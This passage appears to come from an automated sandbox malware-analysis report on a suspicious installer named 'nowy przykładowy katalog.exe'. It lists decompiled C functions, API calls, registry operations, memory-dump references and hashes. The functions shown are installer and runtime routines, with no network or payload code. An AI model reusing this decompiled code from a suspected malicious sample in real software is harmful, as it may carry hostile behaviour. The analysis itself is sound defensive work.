								_t11 = E00405BE9(_t13, _t25, _t27, _t5, _t11);
							}
							_t27 = _t27 + 0x418;
							_t25 = _t25 - 1;
						} while (_t25 != 0);
						goto L15;
					}
					L7:
					if(_t13 != 0xffff) {
						_t13 = 0;
					} else {
						_t13 = 0x3ff;
					}
				}
			}

















                                                  0x004038e7
                                                  0x004038ec
                                                  0x004038f2
                                                  0x004038f7
                                                  0x004038f7
                                                  0x004038ff
                                                  0x00000000
                                                  0x00000000
                                                  0x00403901
                                                  0x00403907
                                                  0x0040390f
                                                  0x00403911
                                                  0x00403917
                                                  0x00403917
                                                  0x00403919
                                                  0x00403925
                                                  0x00000000
                                                  0x00000000
                                                  0x00403929
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040392b
                                                  0x00403930
                                                  0x00403939
                                                  0x0040393f
                                                  0x00403944
                                                  0x00403958
                                                  0x00403963
                                                  0x0040397b
                                                  0x00403981
                                                  0x00403986
                                                  0x0040398e
                                                  0x004039af
                                                  0x004039af
                                                  0x004039af
                                                  0x00403990
                                                  0x00403992
                                                  0x00403992
                                                  0x00403996
                                                  0x00403999
                                                  0x0040399d
                                                  0x0040399d
                                                  0x004039a2
                                                  0x004039a8
                                                  0x004039a8
                                                  0x00000000
                                                  0x00403992
                                                  0x00403946
                                                  0x0040394b
                                                  0x00403954
                                                  0x0040394d
                                                  0x0040394d
                                                  0x0040394d
                                                  0x0040394b

                                                  APIs
                                                  • SetWindowTextA.USER32(00000000,egkwshqw Setup), ref: 0040397B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: TextWindow
                                                  • String ID: "C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe" $1033$Xy$egkwshqw Setup$z=z
                                                  • API String ID: 530164218-1755756683
                                                  • Opcode ID: 44086840014d5f932eec3ecda3fe01ed682aa00d856216dbdc4f037c80fefe2b
                                                  • Instruction ID: 62fcd584ab61880d0a0793d1f8a393d96878735a1f32199b1fca161b6814d522
                                                  • Opcode Fuzzy Hash: 44086840014d5f932eec3ecda3fe01ed682aa00d856216dbdc4f037c80fefe2b
                                                  • Instruction Fuzzy Hash: 7F1105B1B046119BC7349F57DC809737BACEB85715368813FE8016B3A0DA79AD03CB98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00404782, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00404782(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                                                  0x00404790
                                                  0x0040479d
                                                  0x004047a3
                                                  0x004047e1
                                                  0x004047e1
                                                  0x004047f0
                                                  0x004047f7
                                                  0x00000000
                                                  0x004047f9
                                                  0x004047a5
                                                  0x004047b4
                                                  0x004047bc
                                                  0x004047bf
                                                  0x004047d1
                                                  0x004047d7
                                                  0x004047de
                                                  0x00000000
                                                  0x004047de
                                                  0x00000000

                                                  APIs
                                                  • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0040479D
                                                  • GetMessagePos.USER32 ref: 004047A5
                                                  • ScreenToClient.USER32 ref: 004047BF
                                                  • SendMessageA.USER32(?,00001111,00000000,?), ref: 004047D1
                                                  • SendMessageA.USER32(?,0000110C,00000000,?), ref: 004047F7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: Message$Send$ClientScreen
                                                  • String ID: f
                                                  • API String ID: 41195575-1993550816
                                                  • Opcode ID: 3eee6e6f27995ada1ce6a04a907356a17faffc15d7d88bba2040e0493be19c46
                                                  • Instruction ID: 33b793b453c736b4b125c672a543aeedee0a766b6fda49c4207ece5d665b0003
                                                  • Opcode Fuzzy Hash: 3eee6e6f27995ada1ce6a04a907356a17faffc15d7d88bba2040e0493be19c46
                                                  • Instruction Fuzzy Hash: A1019271D00219BADB01DB94CC41BFEBBBCAB49711F10012BBB00B71C0C3B465018BA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 10004BA2, Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 91%
                                                  			E10004BA2(void* __ebx, void* __edi, void* __eflags) {
				void* __esi;
				void* _t3;
				intOrPtr _t6;
				long _t14;
				long* _t27;

				E10004E3E(_t3);
				if(E10005F66() != 0) {
					_t6 = E1000581F(E10004984);
					 *0x100162f4 = _t6;
					__eflags = _t6 - 0xffffffff;
					if(_t6 == 0xffffffff) {
						goto L1;
					} else {
						_t27 = E10005BAB(1, 0x3bc);
						__eflags = _t27;
						if(_t27 == 0) {
							L6:
							E10004C18();
							__eflags = 0;
							return 0;
						} else {
							__eflags = E1000587B( *0x100162f4, _t27);
							if(__eflags == 0) {
								goto L6;
							} else {
								_push(0);
								_push(_t27);
								E10004AEF(__ebx, __edi, _t27, __eflags);
								_t14 = GetCurrentThreadId();
								_t27[1] = _t27[1] | 0xffffffff;
								 *_t27 = _t14;
								__eflags = 1;
								return 1;
							}
						}
					}
				} else {
					L1:
					E10004C18();
					return 0;
				}
			}








                                                  0x10004ba2
                                                  0x10004bae
                                                  0x10004bbd
                                                  0x10004bc2
                                                  0x10004bc8
                                                  0x10004bcb
                                                  0x00000000
                                                  0x10004bcd
                                                  0x10004bda
                                                  0x10004bde
                                                  0x10004be0
                                                  0x10004c0f
                                                  0x10004c0f
                                                  0x10004c14
                                                  0x10004c17
                                                  0x10004be2
                                                  0x10004bf0
                                                  0x10004bf2
                                                  0x00000000
                                                  0x10004bf4
                                                  0x10004bf4
                                                  0x10004bf6
                                                  0x10004bf7
                                                  0x10004bfe
                                                  0x10004c04
                                                  0x10004c08
                                                  0x10004c0c
                                                  0x10004c0e
                                                  0x10004c0e
                                                  0x10004bf2
                                                  0x10004be0
                                                  0x10004bb0
                                                  0x10004bb0
                                                  0x10004bb0
                                                  0x10004bb7
                                                  0x10004bb7

                                                  APIs
                                                  • __init_pointers.LIBCMT ref: 10004BA2
                                                    • Part of subcall function 10004E3E: RtlEncodePointer.NTDLL(00000000,00000001,10004BA7,100044E5,10014570,00000008,100046AD,?,00000001,?,10014590,0000000C,1000477D,?,00000001,?), ref: 10004E41
                                                    • Part of subcall function 10004E3E: __initp_misc_winsig.LIBCMT ref: 10004E5C
                                                    • Part of subcall function 10004E3E: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 100058E0
                                                    • Part of subcall function 10004E3E: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 100058F4
                                                    • Part of subcall function 10004E3E: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 10005907
                                                    • Part of subcall function 10004E3E: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 1000591A
                                                    • Part of subcall function 10004E3E: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 1000592D
                                                    • Part of subcall function 10004E3E: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 10005940
                                                    • Part of subcall function 10004E3E: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 10005953
                                                    • Part of subcall function 10004E3E: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 10005966
                                                    • Part of subcall function 10004E3E: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 10005979
                                                    • Part of subcall function 10004E3E: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 1000598C
                                                    • Part of subcall function 10004E3E: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 1000599F
                                                    • Part of subcall function 10004E3E: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 100059B2
                                                    • Part of subcall function 10004E3E: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 100059C5
                                                    • Part of subcall function 10004E3E: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 100059D8
                                                    • Part of subcall function 10004E3E: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 100059EB
                                                    • Part of subcall function 10004E3E: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 100059FE
                                                  • __mtinitlocks.LIBCMT ref: 10004BA7
                                                  • __mtterm.LIBCMT ref: 10004BB0
                                                    • Part of subcall function 10004C18: DeleteCriticalSection.KERNEL32(?,?,?,?,100045B0,10004596,10014570,00000008,100046AD,?,00000001,?,10014590,0000000C,1000477D,?), ref: 10005FB6
                                                    • Part of subcall function 10004C18: _free.LIBCMT ref: 10005FBD
                                                    • Part of subcall function 10004C18: DeleteCriticalSection.KERNEL32(10016348,?,?,100045B0,10004596,10014570,00000008,100046AD,?,00000001,?,10014590,0000000C,1000477D,?,00000001), ref: 10005FDF
                                                  • __calloc_crt.LIBCMT ref: 10004BD5
                                                  • __initptd.LIBCMT ref: 10004BF7
                                                  • GetCurrentThreadId.KERNEL32 ref: 10004BFE
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.364466627.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.364460119.0000000010000000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364500007.000000001000F000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364511538.0000000010015000.00000040.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364522887.0000000010017000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364528614.000000001001A000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                  • String ID:
                                                  • API String ID: 3567560977-0
                                                  • Opcode ID: d258b63a973da6f3ee54a73adf4b3cf0eb1dd3c380360a6ead9d889c126fb8f1
                                                  • Instruction ID: 40c5fb67e6ea8fb405208f6c91ee4779caaa5e26b67fbf12647dff02284fca1a
                                                  • Opcode Fuzzy Hash: d258b63a973da6f3ee54a73adf4b3cf0eb1dd3c380360a6ead9d889c126fb8f1
                                                  • Instruction Fuzzy Hash: EFF0F0B610A6326DF264F7746C03A4B36C4DF022F1B234229F860D60EEFF61E8424298
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00402B6E, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00402B6E(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x414c40; // 0x67196
					_t11 =  *0x428c50; // 0x6719a
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfA( &_v68, "verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}






                                                  0x00402b7b
                                                  0x00402b89
                                                  0x00402b8f
                                                  0x00402b8f
                                                  0x00402b9d
                                                  0x00402b9f
                                                  0x00402ba5
                                                  0x00402bac
                                                  0x00402bae
                                                  0x00402bae
                                                  0x00402bc4
                                                  0x00402bd4
                                                  0x00402be6
                                                  0x00402be6
                                                  0x00402bee

                                                  APIs
                                                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B89
                                                  • MulDiv.KERNEL32(00067196,00000064,0006719A), ref: 00402BB4
                                                  • wsprintfA.USER32 ref: 00402BC4
                                                  • SetWindowTextA.USER32(?,?), ref: 00402BD4
                                                  • SetDlgItemTextA.USER32 ref: 00402BE6
                                                  Strings
                                                  • verifying installer: %d%%, xrefs: 00402BBE
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                  • String ID: verifying installer: %d%%
                                                  • API String ID: 1451636040-82062127
                                                  • Opcode ID: c9221edef022ada40c9d606a55ceb5485b01ba3fbe0a0649ceb5ce67f638be65
                                                  • Instruction ID: 6a78b715a9a8e57134c517a6b1d06892db6ee10875a93ca7b4af16268fa1b879
                                                  • Opcode Fuzzy Hash: c9221edef022ada40c9d606a55ceb5485b01ba3fbe0a0649ceb5ce67f638be65
                                                  • Instruction Fuzzy Hash: 0C014470544208BBDF209F60DD49FEE3769FB04345F008039FA06A52D0DBB499558F95
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 10002280, Relevance: 9.1, APIs: 6, Instructions: 74COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.364466627.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.364460119.0000000010000000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364500007.000000001000F000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364511538.0000000010015000.00000040.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364522887.0000000010017000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364528614.000000001001A000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: Atom$DeleteProp$ErrorLastRemove
                                                  • String ID:
                                                  • API String ID: 3987138204-0
                                                  • Opcode ID: 02c198ecc514611e5ef54a3d061e450e8e20de416660788afd041813f5a0e0b8
                                                  • Instruction ID: 2d340fa91e4131acd935894f876e959741a3496fd734fa6c2efc2443fb761517
                                                  • Opcode Fuzzy Hash: 02c198ecc514611e5ef54a3d061e450e8e20de416660788afd041813f5a0e0b8
                                                  • Instruction Fuzzy Hash: 17311EB4C0431ADBDB00EFA9C5492AEBBF0FF44350F10842AEC45A7354E7789A94CB92
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00402336, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71registrystringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 85%
                                                  			E00402336(void* __eax) {
				void* _t15;
				char* _t18;
				int _t19;
				char _t24;
				int _t27;
				signed int _t30;
				intOrPtr _t35;
				void* _t37;

				_t15 = E00402B1E(__eax);
				_t35 =  *((intOrPtr*)(_t37 - 0x18));
				 *(_t37 - 0x34) =  *(_t37 - 0x14);
				 *(_t37 - 0x38) = E00402A29(2);
				_t18 = E00402A29(0x11);
				_t30 =  *0x42ecd0; // 0x0
				 *(_t37 - 4) = 1;
				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27, _t30 | 0x00000002, _t27, _t37 + 8, _t27);
				if(_t19 == 0) {
					if(_t35 == 1) {
						E00402A29(0x23);
						_t19 = lstrlenA(0x40a440) + 1;
					}
					if(_t35 == 4) {
						_t24 = E00402A0C(3);
						 *0x40a440 = _t24;
						_t19 = _t35;
					}
					if(_t35 == 3) {
						_t19 = E00402E8E( *((intOrPtr*)(_t37 - 0x1c)), _t27, 0x40a440, 0xc00);
					}
					if(RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x38), _t27,  *(_t37 - 0x34), 0x40a440, _t19) == 0) {
						 *(_t37 - 4) = _t27;
					}
					_push( *(_t37 + 8));
					RegCloseKey();
				}
				 *0x42eca8 =  *0x42eca8 +  *(_t37 - 4);
				return 0;
			}











                                                  0x00402337
                                                  0x0040233c
                                                  0x00402346
                                                  0x00402350
                                                  0x00402353
                                                  0x0040235d
                                                  0x0040236d
                                                  0x00402374
                                                  0x0040237c
                                                  0x0040238a
                                                  0x0040238e
                                                  0x00402399
                                                  0x00402399
                                                  0x0040239d
                                                  0x004023a1
                                                  0x004023a7
                                                  0x004023ac
                                                  0x004023ac
                                                  0x004023b0
                                                  0x004023bc
                                                  0x004023bc
                                                  0x004023d5
                                                  0x004023d7
                                                  0x004023d7
                                                  0x004023da
                                                  0x004024b0
                                                  0x004024b0
                                                  0x004028c1
                                                  0x004028cd

                                                  APIs
                                                  • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402374
                                                  • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nss48B9.tmp,00000023,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402394
                                                  • RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nss48B9.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 004023CD
                                                  • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nss48B9.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 004024B0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: CloseCreateValuelstrlen
                                                  • String ID: C:\Users\user\AppData\Local\Temp\nss48B9.tmp
                                                  • API String ID: 1356686001-3771091846
                                                  • Opcode ID: 0dff74fc9814635757045e0884e09a6858b84c8ed7e39168be7b0d5a6897f032
                                                  • Instruction ID: 7eaf0ec052d83a67d7bbddc98f61bbb11a40701f4c7c8ad3ea5d843478098636
                                                  • Opcode Fuzzy Hash: 0dff74fc9814635757045e0884e09a6858b84c8ed7e39168be7b0d5a6897f032
                                                  • Instruction Fuzzy Hash: 2211A271E00108BFEB10EFA5DE89EAF7678EB40758F20403AF505B31D0D6B85D019A69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 10007879, Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 96%
                                                  			E10007879(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
				void* _t7;
				long _t8;
				intOrPtr* _t9;
				intOrPtr* _t12;
				long _t20;
				long _t31;

				if(_a4 != 0) {
					_t31 = _a8;
					__eflags = _t31;
					if(_t31 != 0) {
						_push(__ebx);
						while(1) {
							__eflags = _t31 - 0xffffffe0;
							if(_t31 > 0xffffffe0) {
								break;
							}
							__eflags = _t31;
							if(_t31 == 0) {
								_t31 = _t31 + 1;
								__eflags = _t31;
							}
							_t7 = HeapReAlloc( *0x1001772c, 0, _a4, _t31);
							_t20 = _t7;
							__eflags = _t20;
							if(_t20 != 0) {
								L17:
								_t8 = _t20;
							} else {
								__eflags =  *0x100191e8 - _t7;
								if(__eflags == 0) {
									_t9 = E10006E77(__eflags);
									 *_t9 = E10006EBE(GetLastError());
									goto L17;
								} else {
									__eflags = E100071EE(_t7, _t31);
									if(__eflags == 0) {
										_t12 = E10006E77(__eflags);
										 *_t12 = E10006EBE(GetLastError());
										L12:
										_t8 = 0;
										__eflags = 0;
									} else {
										continue;
									}
								}
							}
							goto L14;
						}
						E100071EE(_t6, _t31);
						 *((intOrPtr*)(E10006E77(__eflags))) = 0xc;
						goto L12;
					} else {
						E10005653(_a4);
						_t8 = 0;
					}
					L14:
					return _t8;
				} else {
					return E100077E7(__ebx, __edx, __edi, _a8);
				}
			}









                                                  0x10007880
                                                  0x1000788e
                                                  0x10007891
                                                  0x10007893
                                                  0x100078a2
                                                  0x100078d5
                                                  0x100078d5
                                                  0x100078d8
                                                  0x00000000
                                                  0x00000000
                                                  0x100078a5
                                                  0x100078a7
                                                  0x100078a9
                                                  0x100078a9
                                                  0x100078a9
                                                  0x100078b6
                                                  0x100078bc
                                                  0x100078be
                                                  0x100078c0
                                                  0x10007920
                                                  0x10007920
                                                  0x100078c2
                                                  0x100078c2
                                                  0x100078c8
                                                  0x1000790a
                                                  0x1000791e
                                                  0x00000000
                                                  0x100078ca
                                                  0x100078d1
                                                  0x100078d3
                                                  0x100078f2
                                                  0x10007906
                                                  0x100078ec
                                                  0x100078ec
                                                  0x100078ec
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x100078d3
                                                  0x100078c8
                                                  0x00000000
                                                  0x100078ee
                                                  0x100078db
                                                  0x100078e6
                                                  0x00000000
                                                  0x10007895
                                                  0x10007898
                                                  0x1000789e
                                                  0x1000789e
                                                  0x100078ef
                                                  0x100078f1
                                                  0x10007882
                                                  0x1000788c
                                                  0x1000788c

                                                  APIs
                                                  • _malloc.LIBCMT ref: 10007885
                                                    • Part of subcall function 100077E7: __FF_MSGBANNER.LIBCMT ref: 100077FE
                                                    • Part of subcall function 100077E7: __NMSG_WRITE.LIBCMT ref: 10007805
                                                    • Part of subcall function 100077E7: HeapAlloc.KERNEL32(00770000,00000000,00000001,00000000,00000000,00000000,?,10005B7A,?,?,?,00000000,?,10005EFF,00000018,10014640), ref: 1000782A
                                                  • _free.LIBCMT ref: 10007898
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.364466627.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.364460119.0000000010000000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364500007.000000001000F000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364511538.0000000010015000.00000040.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364522887.0000000010017000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364528614.000000001001A000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: AllocHeap_free_malloc
                                                  • String ID:
                                                  • API String ID: 2734353464-0
                                                  • Opcode ID: 9aca786a58cbca4b773bb62be2f12075f5288c3423c812c051a31eb724ccd4d2
                                                  • Instruction ID: c0f5aa5bbe505466c8efabbe68270b10f69c4a9177ca05cf10848bd3a1d8109e
                                                  • Opcode Fuzzy Hash: 9aca786a58cbca4b773bb62be2f12075f5288c3423c812c051a31eb724ccd4d2
                                                  • Instruction Fuzzy Hash: 84119436D44356ABFB219B74DC49A4A37D5FB042E0B21C526FD0C9A199DF38D840C791
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00402A69, Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 84%
                                                  			E00402A69(void* _a4, char* _a8, long _a12) {
				void* _v8;
				char _v272;
				signed char _t16;
				long _t18;
				long _t25;
				intOrPtr* _t27;
				long _t28;

				_t16 =  *0x42ecd0; // 0x0
				_t18 = RegOpenKeyExA(_a4, _a8, 0, _t16 | 0x00000008,  &_v8);
				if(_t18 == 0) {
					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
						__eflags = _a12;
						if(_a12 != 0) {
							RegCloseKey(_v8);
							L8:
							__eflags = 1;
							return 1;
						}
						_t25 = E00402A69(_v8,  &_v272, 0);
						__eflags = _t25;
						if(_t25 != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t27 = E00405F57(4);
					if(_t27 == 0) {
						__eflags =  *0x42ecd0; // 0x0
						if(__eflags != 0) {
							goto L8;
						}
						_t28 = RegDeleteKeyA(_a4, _a8);
						__eflags = _t28;
						if(_t28 != 0) {
							goto L8;
						}
						return _t28;
					}
					return  *_t27(_a4, _a8,  *0x42ecd0, 0);
				}
				return _t18;
			}










                                                  0x00402a79
                                                  0x00402a8a
                                                  0x00402a92
                                                  0x00402aba
                                                  0x00402aa1
                                                  0x00402aa4
                                                  0x00402af4
                                                  0x00402afa
                                                  0x00402afc
                                                  0x00000000
                                                  0x00402afc
                                                  0x00402ab1
                                                  0x00402ab6
                                                  0x00402ab8
                                                  0x00000000
                                                  0x00000000
                                                  0x00402ab8
                                                  0x00402acf
                                                  0x00402ad7
                                                  0x00402ade
                                                  0x00402b04
                                                  0x00402b0a
                                                  0x00000000
                                                  0x00000000
                                                  0x00402b12
                                                  0x00402b18
                                                  0x00402b1a
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00402b1a
                                                  0x00000000
                                                  0x00402aed
                                                  0x00402b01

                                                  APIs
                                                  • RegOpenKeyExA.ADVAPI32(?,?,00000000,00000000,?), ref: 00402A8A
                                                  • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AC6
                                                  • RegCloseKey.ADVAPI32(?), ref: 00402ACF
                                                  • RegCloseKey.ADVAPI32(?), ref: 00402AF4
                                                  • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B12
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: Close$DeleteEnumOpen
                                                  • String ID:
                                                  • API String ID: 1912718029-0
                                                  • Opcode ID: d3779c3a1c279bf6a31e0a00074fd3f509a71b7746d481b871f324af868c8b3c
                                                  • Instruction ID: 1feb4b7649154eaa2fe5ae549c730efe0d3e9f21b7ed1b50a1ad382232646690
                                                  • Opcode Fuzzy Hash: d3779c3a1c279bf6a31e0a00074fd3f509a71b7746d481b871f324af868c8b3c
                                                  • Instruction Fuzzy Hash: DF116A71600009FEDF21AF91DE89DAA3B79FB04354F104076FA05E00A0DBB99E51BF69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00401CDE, Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00401CDE(int __edx) {
				void* _t17;
				struct HINSTANCE__* _t21;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 8), __edx);
				GetClientRect(_t25, _t27 - 0x50);
				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E00402A29(_t21), _t21,  *(_t27 - 0x48) *  *(_t27 - 0x20),  *(_t27 - 0x44) *  *(_t27 - 0x20), 0x10));
				if(_t17 != _t21) {
					DeleteObject(_t17);
				}
				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}







                                                  0x00401ce8
                                                  0x00401cef
                                                  0x00401d1e
                                                  0x00401d26
                                                  0x00401d2d
                                                  0x00401d2d
                                                  0x004028c1
                                                  0x004028cd

